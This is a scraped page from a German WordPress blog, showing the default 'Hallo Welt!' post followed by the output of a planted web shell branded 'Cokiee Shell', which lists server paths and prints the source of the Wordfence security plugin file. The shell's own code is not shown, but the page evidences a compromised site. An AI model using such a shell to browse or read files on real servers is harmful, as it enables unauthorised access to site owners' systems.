Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /var/www/web284/html/wp-content/plugins/wordfence/ |
Current File : //var/www/web284/html/wp-content/plugins/wordfence/wordfence.php |
<?php /* Plugin Name: Wordfence Security Plugin URI: http://www.wordfence.com/ Description: Wordfence Security - Anti-virus, Firewall and High Speed Cache Author: Wordfence Version: 6.0.21 Author URI: http://www.wordfence.com/ */ if(defined('WP_INSTALLING') && WP_INSTALLING){ return; } define('WORDFENCE_VERSION', '6.0.21'); if(get_option('wordfenceActivated') != 1){ add_action('activated_plugin','wordfence_save_activation_error'); function wordfence_save_activation_error(){ update_option('wf_plugin_act_error', ob_get_contents()); } } if(! defined('WORDFENCE_VERSIONONLY_MODE')){ //Used to get version from file. if((int) @ini_get('memory_limit') < 128){ if(strpos(ini_get('disable_functions'), 'ini_set') === false){ @ini_set('memory_limit', '128M'); //Some hosts have ini set at as little as 32 megs. 64 is the min sane amount of memory. } } require_once('lib/wordfenceConstants.php'); require_once('lib/wordfenceClass.php'); wordfence::install_actions(); } ?>
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare